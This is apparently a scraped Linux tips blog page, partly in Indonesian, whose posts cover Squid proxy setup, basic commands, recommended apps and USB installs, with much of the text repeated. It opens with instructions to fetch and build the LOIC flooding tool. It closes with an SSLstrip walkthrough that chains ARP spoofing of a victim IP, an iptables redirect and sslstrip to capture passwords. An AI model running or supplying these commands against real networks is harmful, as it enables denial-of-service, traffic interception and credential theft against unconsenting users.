langsung aje.
- buka terminal - terus ketik "apt-get update"
- ketik lagi "apt-get install mono-complete monodevelop"
- lanjut, ketik "aptitude install liblog4net-cli-dev"
- nah masih ada nih, ketik "wget "http://cloud.github.com/downloads/NewEraCracker/LOIC/loic.v1.1.1.25.zip""
untuk donlot toolnya- terus ,
- pindah ke folder tempat donlot LOIC tadi , ketik "unzip loic.v1.1.1.25.zip"
- pindah ke dir source "cd source"
- terus ketik "mdtool build" , tunggu bentaran
- pindah direktori lagi "cd bin/Debug"- last, ketik "mono LOIC.exe"
sumber : https://www.facebook.com/groups/cyberarmy99/doc/395088347195285/
Showing posts with label LINUX. Show all posts
Showing posts with label LINUX. Show all posts
Tips Setting Membuat Proxy Server dengan Squid Debian
Untuk
mengatur penggunaan internet di kantor atau sekolah Proxy Server
merupakan suatu hal yang wajib agar user tidak menyalahgunakan fasilitas
koneksi internet seperti membuka situs – situs yang tidak baik misalnya
situs – situs yang mengandung pornografi, perjudian, kekerasan, dsb.
Atau juga mengontrol penggunaan
Berikut ini akan coba saya tulis cara instalasi Proxy Server menggunakan Squid pada Debian dan konfigurasi minimum agar Squid bisa berjalan. Sedangkan untuk konfigurasi tingkat lanjut seperti penambahan rules, blocking situs, bandwidth management .
Persiapan
PC yang sudah terinstall Linux. Dalam kasus ini saya menggunakan Debian Lenny. Secara umum langkahnya sama. Perbedaannya hanya pada saat proses installasi paket Squid. Jika pada Debian dan turunannya (Ubuntu dll) menggunakan “apt-get”, pada RedHat dan turunannya (Centos dll) menggunakan “yum”. PC ini harus memiliki paling tidak 2 interface. 1 interface terhubung ke LAN dan 1 lagi ke WAN yang dalam contoh kali ini terhubng ke modem speedy.
Network Topology
Modem Speedy —> Proxy Server —> LAN
Modem Speedy
IP Address : 192.168.0.1
Netmask : 255.255.255.0
DNS : 202.134.0.155, 203.130.196.5, 222.124.204.34
Proxy Server
eth0 (connected to Modem Speedy)
IP Address : 192.168.0.2
Netmask : 255.255.255.0
Gateway : 192.168.0.1
eth1 (connected to LAN)
IP Address : 192.168.1.1
Netmask : 255.255.255.0
LAN
IP Address : 192.168.1.2 – 192.168.1.254
Netmask : 255.255.255.0
Default Gateway : 192.168.1.1
DNS Server : 192.168.1.1
Setting Network dan IPtables
Lakukan setting network di Proxy Server dengan mengedit file /etc/network/interfaces (untuk distro selain Debian dan Ubuntu silakan menyesuaikan) sebagai berikut:
auto lo eth0 eth1
iface lo inet loopback
# The primary network interface
iface eth0 inet static
address 192.168.0.2
netmask 255.255.255.0
broadcast 192.168.0.255
network 192.168.0.0
gateway 192.168.0.1
iface eth1 inet static
address 192.168.1.1
netmask 255.255.255.0
broadcast 192.168.1.255
network 192.168.1.0
Restart network untuk mendapatkan efek.
/etc/init.d/networking restart
atau
/etc/init.d/networking force-reload
Cek hasil konfigurasi network dengan perintah “ifconfig” (tanpa tanda petik). Pastikan hasil konfigurasi telah sesuai.
Edit file /etc/resolv.conf sebagai berikut untuk DNS Server:
nameserver 202.134.0.155
nameserver 203.130.196.5
nameserver 222.124.204.34
Edit file /etc/sysctl.conf dengan menghilangkan tanda # pada baris #net.ipv4.ip_forward=1.
sebelum
#net.ipv4.ip_forward=1
sesudah
net.ipv4.ip_forward=1
Simpan konfigurasi kemudian aktifkan dengan perintah berikut:
sysctl -p
Lakukan konfigurasi IPtables sebagai berikut:
iptables -t nat -A POSTROUTING -o eth0 -j SNAT –to-source 192.168.0.2
iptables -t nat -A PREROUTING -p tcp -i eth1 –dport 80 REDIRECT –to-ports 3128
Baris pertama melakukan source NAT semua paket yang keluar dari eth0 yang terhubung ke modem speedy sehingga semua client di LAN IP Addressnya akan terbaca 192.168.0.2 (IP Address Proxy Server yang terhubung ke modem speedy) oleh modem speedy. Hal ini dilakukan agar semua client di LAN bisa akses internet.
Sedangkan baris ke 2 berfungsi mengalihkan semua paket yang masuk ke eth1 dari LAN yang menuju port 80 (port web server) ke port Squid yaitu port 3128. Tanpa baris ini maka fungsi Squid sebagai proxy server tidak akan bekerja.
Konfigurasi IPtables di atas bersifat sementara. Jika komputer direstart maka konfigurasi IPtables akan hilang. Untuk mengatasi hal ini lakukan langkah – langkah berikut:
Simpan konfigurasi IPtables ke suatu file (dalm contoh ini ke file /etc/iptables.up.rules) dengan perintah berikut:
iptables-save > /etc/iptables.up.rules
Edit file /etc/network/interfaces. Tambahkan baris “post-up iptables-restore < /etc/iptables.up.rules” agar konfigurasi IPtables di load setelah interface up. Setelah diedit hasilnya adalah sebagai berikut:
auto lo eth0 eth1
iface lo inet loopback
# The primary network interface
iface eth0 inet static
address 192.168.0.2
netmask 255.255.255.0
broadcast 192.168.0.255
network 192.168.0.0
gateway 192.168.0.1
iface eth1 inet static
address 192.168.1.1
netmask 255.255.255.0
broadcast 192.168.1.255
network 192.168.1.0
post-up iptables-restore < /etc/iptables.up.rules
Installasi Squid
Setelah network dan Iptables selesai dikonfigure maka tahap selanjutnya adalah installasi Squid. Gunakan perintah berikut:
apt-get install squid
Setelah Squid terinstall lakukan konfigurasi minimum sebagai berikut:
http_port 3128 transparent
cache_dir ufs 20480 16 256
acl localnet 192.168.1.0/24
http_access allow localnet
http_access deny all
Kemudian restart squid dengan perintah berikut:
/etc/init.d/squid restart
Pastikan squid berjalan dengan menggunakan perintah berikut:
ps ax | grep squid
Jika squid telah berjalan maka seharusnya output dari perintah di atas tidak kosong. Atau bisa gunakan utility “nmap” yang terlebih dahulu harus diinstall dengan perintah “apt-get install nmap” (tanpa tanda petik). Ketikkan perintah berikut maka seharusnya ada baris “3128/tcp open squid-http” yang menandakan Squid telah berjalan:
nmap localhost
Install dnsmasq
Tahap selanjutnya adalah menginstall dnsmasq yang berfungsi sebagai caching DNS server (memetakan nama doamin ke IP Address) sehingga di client tidak perlu menggunakan DNS server public (DNS Server speedy.) Hal ini akan mengurangi traffic ke DNS server public sehingga sedikit banyak akan menekan penggunaan bandwidth. Install dnsmasq dengan perintah berikut:
apt-get install dnsmasq
Setalah terinstall cek apakah dnsmasq telah berjalan dengan perintah berikut:
ps ax | grep dnsmasq
Atau bisa juga dengan perintah “nmap localhost” (tanpa tanda petik). Jika dnsmasq telah berjalan maka output perintah tadi akan ada baris “53/tcp open domain”.
Semua konfigurasi telah selesai kita lakukan. Langkah selanjutnya adalah melakukan test dari PC client untuk akses ke internet. Jika halaman web terbuka maka Proxy Server telah berhasil kita buat. Konfigurasi IP Address client bisa dilihat di bagian Network Topology artikel ini.
Langkah selanjutnya adalah membuat rules tambahan untuk mengontrol penggunaan internet. Baik itu blocking situs, bandwidth management, maupun rules lain. Seperti janji saya, artikel tentang ini akan saya terbitkan segera.
Berikut ini akan coba saya tulis cara instalasi Proxy Server menggunakan Squid pada Debian dan konfigurasi minimum agar Squid bisa berjalan. Sedangkan untuk konfigurasi tingkat lanjut seperti penambahan rules, blocking situs, bandwidth management .
Persiapan
PC yang sudah terinstall Linux. Dalam kasus ini saya menggunakan Debian Lenny. Secara umum langkahnya sama. Perbedaannya hanya pada saat proses installasi paket Squid. Jika pada Debian dan turunannya (Ubuntu dll) menggunakan “apt-get”, pada RedHat dan turunannya (Centos dll) menggunakan “yum”. PC ini harus memiliki paling tidak 2 interface. 1 interface terhubung ke LAN dan 1 lagi ke WAN yang dalam contoh kali ini terhubng ke modem speedy.
Network Topology
Modem Speedy —> Proxy Server —> LAN
Modem Speedy
IP Address : 192.168.0.1
Netmask : 255.255.255.0
DNS : 202.134.0.155, 203.130.196.5, 222.124.204.34
Proxy Server
eth0 (connected to Modem Speedy)
IP Address : 192.168.0.2
Netmask : 255.255.255.0
Gateway : 192.168.0.1
eth1 (connected to LAN)
IP Address : 192.168.1.1
Netmask : 255.255.255.0
LAN
IP Address : 192.168.1.2 – 192.168.1.254
Netmask : 255.255.255.0
Default Gateway : 192.168.1.1
DNS Server : 192.168.1.1
Setting Network dan IPtables
Lakukan setting network di Proxy Server dengan mengedit file /etc/network/interfaces (untuk distro selain Debian dan Ubuntu silakan menyesuaikan) sebagai berikut:
auto lo eth0 eth1
iface lo inet loopback
# The primary network interface
iface eth0 inet static
address 192.168.0.2
netmask 255.255.255.0
broadcast 192.168.0.255
network 192.168.0.0
gateway 192.168.0.1
iface eth1 inet static
address 192.168.1.1
netmask 255.255.255.0
broadcast 192.168.1.255
network 192.168.1.0
Restart network untuk mendapatkan efek.
/etc/init.d/networking restart
atau
/etc/init.d/networking force-reload
Cek hasil konfigurasi network dengan perintah “ifconfig” (tanpa tanda petik). Pastikan hasil konfigurasi telah sesuai.
Edit file /etc/resolv.conf sebagai berikut untuk DNS Server:
nameserver 202.134.0.155
nameserver 203.130.196.5
nameserver 222.124.204.34
Edit file /etc/sysctl.conf dengan menghilangkan tanda # pada baris #net.ipv4.ip_forward=1.
sebelum
#net.ipv4.ip_forward=1
sesudah
net.ipv4.ip_forward=1
Simpan konfigurasi kemudian aktifkan dengan perintah berikut:
sysctl -p
Lakukan konfigurasi IPtables sebagai berikut:
iptables -t nat -A POSTROUTING -o eth0 -j SNAT –to-source 192.168.0.2
iptables -t nat -A PREROUTING -p tcp -i eth1 –dport 80 REDIRECT –to-ports 3128
Baris pertama melakukan source NAT semua paket yang keluar dari eth0 yang terhubung ke modem speedy sehingga semua client di LAN IP Addressnya akan terbaca 192.168.0.2 (IP Address Proxy Server yang terhubung ke modem speedy) oleh modem speedy. Hal ini dilakukan agar semua client di LAN bisa akses internet.
Sedangkan baris ke 2 berfungsi mengalihkan semua paket yang masuk ke eth1 dari LAN yang menuju port 80 (port web server) ke port Squid yaitu port 3128. Tanpa baris ini maka fungsi Squid sebagai proxy server tidak akan bekerja.
Konfigurasi IPtables di atas bersifat sementara. Jika komputer direstart maka konfigurasi IPtables akan hilang. Untuk mengatasi hal ini lakukan langkah – langkah berikut:
Simpan konfigurasi IPtables ke suatu file (dalm contoh ini ke file /etc/iptables.up.rules) dengan perintah berikut:
iptables-save > /etc/iptables.up.rules
Edit file /etc/network/interfaces. Tambahkan baris “post-up iptables-restore < /etc/iptables.up.rules” agar konfigurasi IPtables di load setelah interface up. Setelah diedit hasilnya adalah sebagai berikut:
auto lo eth0 eth1
iface lo inet loopback
# The primary network interface
iface eth0 inet static
address 192.168.0.2
netmask 255.255.255.0
broadcast 192.168.0.255
network 192.168.0.0
gateway 192.168.0.1
iface eth1 inet static
address 192.168.1.1
netmask 255.255.255.0
broadcast 192.168.1.255
network 192.168.1.0
post-up iptables-restore < /etc/iptables.up.rules
Installasi Squid
Setelah network dan Iptables selesai dikonfigure maka tahap selanjutnya adalah installasi Squid. Gunakan perintah berikut:
apt-get install squid
Setelah Squid terinstall lakukan konfigurasi minimum sebagai berikut:
http_port 3128 transparent
cache_dir ufs 20480 16 256
acl localnet 192.168.1.0/24
http_access allow localnet
http_access deny all
Kemudian restart squid dengan perintah berikut:
/etc/init.d/squid restart
Pastikan squid berjalan dengan menggunakan perintah berikut:
ps ax | grep squid
Jika squid telah berjalan maka seharusnya output dari perintah di atas tidak kosong. Atau bisa gunakan utility “nmap” yang terlebih dahulu harus diinstall dengan perintah “apt-get install nmap” (tanpa tanda petik). Ketikkan perintah berikut maka seharusnya ada baris “3128/tcp open squid-http” yang menandakan Squid telah berjalan:
nmap localhost
Install dnsmasq
Tahap selanjutnya adalah menginstall dnsmasq yang berfungsi sebagai caching DNS server (memetakan nama doamin ke IP Address) sehingga di client tidak perlu menggunakan DNS server public (DNS Server speedy.) Hal ini akan mengurangi traffic ke DNS server public sehingga sedikit banyak akan menekan penggunaan bandwidth. Install dnsmasq dengan perintah berikut:
apt-get install dnsmasq
Setalah terinstall cek apakah dnsmasq telah berjalan dengan perintah berikut:
ps ax | grep dnsmasq
Atau bisa juga dengan perintah “nmap localhost” (tanpa tanda petik). Jika dnsmasq telah berjalan maka output perintah tadi akan ada baris “53/tcp open domain”.
Semua konfigurasi telah selesai kita lakukan. Langkah selanjutnya adalah melakukan test dari PC client untuk akses ke internet. Jika halaman web terbuka maka Proxy Server telah berhasil kita buat. Konfigurasi IP Address client bisa dilihat di bagian Network Topology artikel ini.
Langkah selanjutnya adalah membuat rules tambahan untuk mengontrol penggunaan internet. Baik itu blocking situs, bandwidth management, maupun rules lain. Seperti janji saya, artikel tentang ini akan saya terbitkan segera.
Command-Command Dasar Untuk Linux
Berikut command-command dasar Linux yang perlu untuk dipelajari agar kita dapat menggunakan Linux dengan baik.
cat
Contoh : $ cat namafile
Fungsi : Menampilkan isi dari sebuah file di layar.
cd
Fungsi : Digunakan untuk berpindah direktori seperti fungsi cd dalam windows.
chmod
Contoh : $ chmod 777 namafile/nama direktori
Fungsi : Digunakan untuk menambah dan mengurangi ijin pemakai untuk mengakses file atau direktori.
chown
Fungsi : Digunakan mengganti owner dari suatu file atau direktori.
cp
Contoh : $ cp <namafile1> <namafile2>
Untuk menyalin file atau copy. Misalnya untuk menyalin file1 menjadi file2.
find
Contoh : $ find . -name *.doc -print
Fungsi : Untuk mencari letak sebuah file.
grep
Contoh : $ grep <teks> <file>
Fungsi : Digunakan untuk mencari file-file yang mengandung teks dengan kriteria yang telah Anda tentukan
gzip
Contoh : $ gzip <namafile>
Fungsi : Digunakan untuk mengkompresi sebuah file
kill
Contoh : $ kill <sinyal> <pid>
Fungsi : Digunakan untuk menghentikan proses yang sedang berjalan.
ls
Fungsi : Digunakan untuk menampilkan isi dari sebuah direktori seperti command dir dalam windows.
lsmod
Fungsi : Digunakan untuk melihat modul-modul yang ada
rmmod
Fungsi : Digunakan untuk menghapus modul-modul yang ada
mkdir
Contoh : $ mkdir <data>
Fungsi : Digunakan untuk Membuat direktori baru seperti command md di DOS.
mv
Fungsi : Digunakan untuk memindahkan file dari satu lokasi ke lokasi yang lain.
pwd
Fungsi : Digunakan untuk menampilkan nama direktori dimana anda saat itu sedang berada.
passwd
Fungsi : Digunakan untuk mengganti password root.
ps aux
Fungsi : Digunakan untuk melihat proses-proses yang sedang berjalan.
rm
Fungsi : Digunakan untuk menghapus file, tetapi secara default command rm tidak menghapus direktori.
rmdir
Fungsi : Digunakan untuk menghapus direktori kosong.
rpm
Fungsi : Digunakan untuk menginstall file rpm
su
Fungsi : Digunakan untuk login sementara sebagai user lain.
start
Fungsi : Sebuah perintah untuk menjalankan servis.
stop
Fungsi : Sebuah perintah untuk menghentikan servis.
shutdown
Fungsi : Sebuah perintah untuk mematikan sistem.
tar
Contoh : $ tar <aksi> <option> <file atau direktori>
Fungsi : Menyimpan dan mengekstrak file dari media seperti tape drive atau hard disk.
unzip
Contoh : $ unzip <namafile>
Fungsi : Digunakan untuk mengekstrak atau menguraikan file yang dikompres dengan zip.
cat
Contoh : $ cat namafile
Fungsi : Menampilkan isi dari sebuah file di layar.
cd
Fungsi : Digunakan untuk berpindah direktori seperti fungsi cd dalam windows.
chmod
Contoh : $ chmod 777 namafile/nama direktori
Fungsi : Digunakan untuk menambah dan mengurangi ijin pemakai untuk mengakses file atau direktori.
chown
Fungsi : Digunakan mengganti owner dari suatu file atau direktori.
cp
Contoh : $ cp <namafile1> <namafile2>
Untuk menyalin file atau copy. Misalnya untuk menyalin file1 menjadi file2.
find
Contoh : $ find . -name *.doc -print
Fungsi : Untuk mencari letak sebuah file.
grep
Contoh : $ grep <teks> <file>
Fungsi : Digunakan untuk mencari file-file yang mengandung teks dengan kriteria yang telah Anda tentukan
gzip
Contoh : $ gzip <namafile>
Fungsi : Digunakan untuk mengkompresi sebuah file
kill
Contoh : $ kill <sinyal> <pid>
Fungsi : Digunakan untuk menghentikan proses yang sedang berjalan.
ls
Fungsi : Digunakan untuk menampilkan isi dari sebuah direktori seperti command dir dalam windows.
lsmod
Fungsi : Digunakan untuk melihat modul-modul yang ada
rmmod
Fungsi : Digunakan untuk menghapus modul-modul yang ada
mkdir
Contoh : $ mkdir <data>
Fungsi : Digunakan untuk Membuat direktori baru seperti command md di DOS.
mv
Fungsi : Digunakan untuk memindahkan file dari satu lokasi ke lokasi yang lain.
pwd
Fungsi : Digunakan untuk menampilkan nama direktori dimana anda saat itu sedang berada.
passwd
Fungsi : Digunakan untuk mengganti password root.
ps aux
Fungsi : Digunakan untuk melihat proses-proses yang sedang berjalan.
rm
Fungsi : Digunakan untuk menghapus file, tetapi secara default command rm tidak menghapus direktori.
rmdir
Fungsi : Digunakan untuk menghapus direktori kosong.
rpm
Fungsi : Digunakan untuk menginstall file rpm
su
Fungsi : Digunakan untuk login sementara sebagai user lain.
start
Fungsi : Sebuah perintah untuk menjalankan servis.
stop
Fungsi : Sebuah perintah untuk menghentikan servis.
shutdown
Fungsi : Sebuah perintah untuk mematikan sistem.
tar
Contoh : $ tar <aksi> <option> <file atau direktori>
Fungsi : Menyimpan dan mengekstrak file dari media seperti tape drive atau hard disk.
unzip
Contoh : $ unzip <namafile>
Fungsi : Digunakan untuk mengekstrak atau menguraikan file yang dikompres dengan zip.
10 Aplikasi Yang Berguna Untuk Linux
1. OpenOffice
OpenOffice adalah produk multi-platform untuk perkantoran.
Didalamnya terdapat aplikasi desktop seperti pengolah kata, spreadsheet, presentasi manajer, dan program gambar dengan antarmuka pengguna dan fitur lainnya yang mirip dengan program perkantoran yang lain.
Download OpenOffice
(http://openoffice.mirrors.tds.net/pub/openoffice/stable/3.0.1/).
2. Calm Antivirus
Clam AntiVirus adalah aplikasi open source (GPL) anti-virus toolkit untuk UNIX yang dirancang untuk e-mail pada pemindaian mail gateways.
Clam AntiVirus memberikan sejumlah utilitas termasuk yang fleksibel, scalable multi-threaded daemon, a command line scanner dan dapat melakukan update database secara otomatis.
Download ClamAV (http://www.clamav.net/download/).
3. FileZilla
Filezilla merupakan solusi aplikasi gratis untuk FTP.
Filezilla klien adalah aplikasi yang cepat dan handal untuk lintas-platform FTP, FTPS dan SFTP client dengan banyak fitur bermanfaat dengan intuitif grafis antarmuka pengguna.
Download FileZilla
(http://filezilla-project.org/download.php?type=client)
Download FileZilla Server
(http://filezilla-project.org/download.php?type=server).
4. gZIP
gzip (GNU zip) adalah utilitas untuk kompresi.
Keuntungan gZIP adalah kompresi yang lebih baik dan bebas dari paten algoritma.
Alat ini telah diadopsi oleh proyek GNU dan sekarang cukup populer di Internet.
Download gzip (http://www.gzip.org/).
5. PuTTy
Putty merupakan aplikasi implementasi gratis untuk Telnet dan SSH.
Putty dapat digunakan di sistem operasi Win32 dan platform Unix.
Download Putty
(http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html).
6. OpenSSH
OpenSSH adalah sebuah versi GRATIS dari alat konektivitas SSH.
Pengguna telnet, rlogin, dan ftp mungkin tidak menyadari bahwa password mereka ditularkan di Internet tanpa enkripsi.
Tetapi OpenSSH melakukan encrypts semua lalu lintas (termasuk password) secara efektif untuk menghindari eavesdropping, pembajakan koneksi dan serangan lainnya.
Sebagai tambahan, OpenSSH menyediakan kemampuan tunneling secara aman dan beberapa metode otentikasi, dan mendukung semua versi SSH protokol.
Download OpenSSH
(http://www.openssh.org/portable.html).
7. Conky
Conky adalah aplikasi gratis, Conky dapat menampilkan informasi apapun di komputer Anda.
Fasiltas Conky antara lain :
* Menampilkan info statistik seperti :
uname, uptime, penggunaan CPU, penggunaan mempry, penggunaan harddisk, proses statistik dan memantau jaringan.
* Mendukung POP3 dan IMAP.
* Mendukung banyak sekali pemutar musik seperti MPD, XMMS2, BMPx, audacious dan lebih banyak lagi.
Conky dapat menampilkan informasi baik sebagai teks, proses yang sederhana dan grafik widget dengan warna dan font yang berbeda.
Download Conky
(http://sourceforge.net/project/showfiles.php?group_id=143975&package_id=158249).
8. TrueCrypt
TrueCrypt merupakan aplikasi encryption yang open source untuk Windows Vista / XP, Mac OS X, dan Linux
Kegunaan TrueCrypt antara lain :
* Membuat virtual disk yang dienkripsi dalam file dan mounts sebagai real disk.
* Melakukan Enkripsi partisi atau perangkat penyimpanan seperti USB flash drive dan hard drive.
* Melakukan Enkripsi partisi atau drive di mana Windows terinstal (pre-boot otentikasi).
* Melakukan Enkripsi secara otomatis, real-time (on-the-fly) dan transparan.
* Memberikan tingkat dua masuk akal deniability, jika sebuah pasukan musuh yang mengungkapkan password:
* Menggunakan algoritma: AES-256, Serpent, aTwofish dan Modus operasi: XTS.
Download TrueCrypt (http://www.truecrypt.org/downloads.php).
9. FireStarter
Firestarter adalah Real Time Firewall yang memonitor semua port yang terbuka dan aktif pada koneksi jaringan di komputer Anda.
Memungkinkan Anda untuk menetapkan aturan yang sangat ketat ditetapkan.
Fitur utama termasuk
* Open Source dan tersedia secara gratis.
* Mudah untuk menggunakan dengan antarmuka grafis.
* Cocok untuk digunakan di desktop, server dan gateways.
* Memungkinkan Anda untuk mengatur inbound dan outbound sesuai aturan.
* Dapat melihat aktifitas jaringan termasuk lalu lintas melalui firewall.
Download FireStarter (http://www.fs-security.com/download.php).
10. GParted
GParted adalah aplikasi Gnome Partition Editor.
GParted adalah aplikasi untuk menciptakan, menghapus, mengganti ukuran, memindahkan, memeriksa, menyalin partisi dan file sistem.
GParted dapat membuat ruang untuk sistem operasi baru , pengaturan ulang penggunaan disk, menyalin data yang berada pada hard disk dan partisi mirroring satu dengan lainnya.
Download Gparted (http://gparted.sourceforge.net/download.php)
OpenOffice adalah produk multi-platform untuk perkantoran.
Didalamnya terdapat aplikasi desktop seperti pengolah kata, spreadsheet, presentasi manajer, dan program gambar dengan antarmuka pengguna dan fitur lainnya yang mirip dengan program perkantoran yang lain.
Download OpenOffice
(http://openoffice.mirrors.tds.net/pub/openoffice/stable/3.0.1/).
2. Calm Antivirus
Clam AntiVirus adalah aplikasi open source (GPL) anti-virus toolkit untuk UNIX yang dirancang untuk e-mail pada pemindaian mail gateways.
Clam AntiVirus memberikan sejumlah utilitas termasuk yang fleksibel, scalable multi-threaded daemon, a command line scanner dan dapat melakukan update database secara otomatis.
Download ClamAV (http://www.clamav.net/download/).
3. FileZilla
Filezilla merupakan solusi aplikasi gratis untuk FTP.
Filezilla klien adalah aplikasi yang cepat dan handal untuk lintas-platform FTP, FTPS dan SFTP client dengan banyak fitur bermanfaat dengan intuitif grafis antarmuka pengguna.
Download FileZilla
(http://filezilla-project.org/download.php?type=client)
Download FileZilla Server
(http://filezilla-project.org/download.php?type=server).
4. gZIP
gzip (GNU zip) adalah utilitas untuk kompresi.
Keuntungan gZIP adalah kompresi yang lebih baik dan bebas dari paten algoritma.
Alat ini telah diadopsi oleh proyek GNU dan sekarang cukup populer di Internet.
Download gzip (http://www.gzip.org/).
5. PuTTy
Putty merupakan aplikasi implementasi gratis untuk Telnet dan SSH.
Putty dapat digunakan di sistem operasi Win32 dan platform Unix.
Download Putty
(http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html).
6. OpenSSH
OpenSSH adalah sebuah versi GRATIS dari alat konektivitas SSH.
Pengguna telnet, rlogin, dan ftp mungkin tidak menyadari bahwa password mereka ditularkan di Internet tanpa enkripsi.
Tetapi OpenSSH melakukan encrypts semua lalu lintas (termasuk password) secara efektif untuk menghindari eavesdropping, pembajakan koneksi dan serangan lainnya.
Sebagai tambahan, OpenSSH menyediakan kemampuan tunneling secara aman dan beberapa metode otentikasi, dan mendukung semua versi SSH protokol.
Download OpenSSH
(http://www.openssh.org/portable.html).
7. Conky
Conky adalah aplikasi gratis, Conky dapat menampilkan informasi apapun di komputer Anda.
Fasiltas Conky antara lain :
* Menampilkan info statistik seperti :
uname, uptime, penggunaan CPU, penggunaan mempry, penggunaan harddisk, proses statistik dan memantau jaringan.
* Mendukung POP3 dan IMAP.
* Mendukung banyak sekali pemutar musik seperti MPD, XMMS2, BMPx, audacious dan lebih banyak lagi.
Conky dapat menampilkan informasi baik sebagai teks, proses yang sederhana dan grafik widget dengan warna dan font yang berbeda.
Download Conky
(http://sourceforge.net/project/showfiles.php?group_id=143975&package_id=158249).
8. TrueCrypt
TrueCrypt merupakan aplikasi encryption yang open source untuk Windows Vista / XP, Mac OS X, dan Linux
Kegunaan TrueCrypt antara lain :
* Membuat virtual disk yang dienkripsi dalam file dan mounts sebagai real disk.
* Melakukan Enkripsi partisi atau perangkat penyimpanan seperti USB flash drive dan hard drive.
* Melakukan Enkripsi partisi atau drive di mana Windows terinstal (pre-boot otentikasi).
* Melakukan Enkripsi secara otomatis, real-time (on-the-fly) dan transparan.
* Memberikan tingkat dua masuk akal deniability, jika sebuah pasukan musuh yang mengungkapkan password:
* Menggunakan algoritma: AES-256, Serpent, aTwofish dan Modus operasi: XTS.
Download TrueCrypt (http://www.truecrypt.org/downloads.php).
9. FireStarter
Firestarter adalah Real Time Firewall yang memonitor semua port yang terbuka dan aktif pada koneksi jaringan di komputer Anda.
Memungkinkan Anda untuk menetapkan aturan yang sangat ketat ditetapkan.
Fitur utama termasuk
* Open Source dan tersedia secara gratis.
* Mudah untuk menggunakan dengan antarmuka grafis.
* Cocok untuk digunakan di desktop, server dan gateways.
* Memungkinkan Anda untuk mengatur inbound dan outbound sesuai aturan.
* Dapat melihat aktifitas jaringan termasuk lalu lintas melalui firewall.
Download FireStarter (http://www.fs-security.com/download.php).
10. GParted
GParted adalah aplikasi Gnome Partition Editor.
GParted adalah aplikasi untuk menciptakan, menghapus, mengganti ukuran, memindahkan, memeriksa, menyalin partisi dan file sistem.
GParted dapat membuat ruang untuk sistem operasi baru , pengaturan ulang penggunaan disk, menyalin data yang berada pada hard disk dan partisi mirroring satu dengan lainnya.
Download Gparted (http://gparted.sourceforge.net/download.php)
How to Install any Linux on a USB
Install Linux on USB:
There are so many reasons why having a Linux distribution on a USB drive can come in handy. From having a “rescue” OS on your keyring to being able to install a new distribution on your EeePC, a “thumb drive” Linux has many uses. But getting Linux onto a USB drive can’t be simple. Right? Wrong. There is a tool, UNetbootin, that makes installing Linux on a USB drive simple.
UNetbootin can be used on either Linux or Windows. In this article, we’ll be illustrating it for Both.
Note: Not all USB installations will work on all machines. This can be an issue with your BIOS or your USB drive. If you install an OS that doesn’t work, try another. But after all that work, you might wind up with a machine that simply won’t boot from a USB drive. You have been warned.
Using Unetbootin with linux:
1. The first thing to do is download a copy of UNetbootin from Download unetbootin for linux (For our purposes we’ll download the Linux universal install binary (named unetbootin-linux-299).Once that has finished you will need to issue the Following command in order to make the file executable.
chmod u+x unetbootin-linux29
2. Once the file is executable issue the following command (from the same directory unetbootin-linx-299 is stored) to see the application running. su ./unetbootin-linux-299
3. But you’re not ready just yet. Depending upon your distribution, you might come across an error involving p7zip-full. This might be in your distribution’s repositories. If you use Mandriva you can install p7zip but you will not have the full package. If you use Ubuntu you can get p7zip-full with the following command
apt-get install p7zip-full
4. Before you run the application you will need to insert and mount your usb drive. Stick in your usb drive and then issue the following command to find out where your usb drive is located.
dmesg
5. Mount that and then issue the following command. When you issue the command you will see the UNetbootin window.
su ./unetbootin-linux-299
6. Once this window is up and running you are almost there. If you have very specific needs for your distribution you will most likely have an image file downloaded to use. If you do not you can select your distribution from the drop down list. First you select the distribution and then you select the version (or release).
Note: Unless you have a very large USB drive you will most likely want to use a netinstall version of your distribution. If you do happen to have a large USB drive you can go ahead with a full distribution. If this usb drive is for rescue purposes, or just to have a version of Linux with you at all times, a distribution like PCLinuxOS Minime is a greate choice
7. Once the process is done you will have two buttons to click, Reboot and Exit. Don’t bother with the Reboot button. Click the Exit button and UNetbootin will close. You can now unmount your drive and reboot your machine to see if the installation works.Note: When your machine boots you will need to make sure it first boots from the USB device
Using UNebootin with Windows:
- Download (Download unetbootin for windows) UNetBootin for Windows.
- Download your favorite Linux ISO (Don’t ask me from where just Google it).
- Now Start the Unetbootin.
- Click the disk image radio box and browse to select linx iso
- Now set your target USB drive and click OK to start the creation UNetbootin Live USB Creation from an ISO
- Once the unetbootin insatller has completed, click reboot. now UNetbootin installation is finished.
- Set your system BIOS or boot menu to boot from the USB device and enjoy favorite live linux on USB
SSLstrip
SSLstrip was released by Moxie to demonstrate the vulnerabilities he spoke about at Blackhat 2009. In this video we will look at how to get started with SSLstrip. We setup 2 vmware machines, one running Widnows XP (victim) and the other Backtrack 3 (Attacker). Before we actually begin hacking using SSLstrip, we need to setup the entire Man in the Middle Mechanism and packet redirection / forwarding mechanism. We do this by using the following commands in sequence:
1. Setting up IP Forwarding:
echo 1 > /proc/sys/net/ipv4/ip_forward
2. ARP MITM attack between Victim and Gateway:
arpspoof -i eth0 -t 192.168.1.6 192.168.1.1
3. Setting up port redirection using Iptables:
iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 10000
4. Start the SSLstrip tool and make it listen to port 10000 (default anyways)
python sslstrip.py -w secret
Once this setup is up and running perfectly, all of our victim’s traffic will be routed through us. In particular, HTTP traffic will be redirected to our port 10000, where SSLstrip is listening. After this we will be able to eavesdrop and steal all of the victim’s passwords sent supposedly over “SSL”.
1. Setting up IP Forwarding:
echo 1 > /proc/sys/net/ipv4/ip_forward
2. ARP MITM attack between Victim and Gateway:
arpspoof -i eth0 -t 192.168.1.6 192.168.1.1
3. Setting up port redirection using Iptables:
iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 10000
4. Start the SSLstrip tool and make it listen to port 10000 (default anyways)
python sslstrip.py -w secret
Once this setup is up and running perfectly, all of our victim’s traffic will be routed through us. In particular, HTTP traffic will be redirected to our port 10000, where SSLstrip is listening. After this we will be able to eavesdrop and steal all of the victim’s passwords sent supposedly over “SSL”.
Subscribe to:
Posts (Atom)
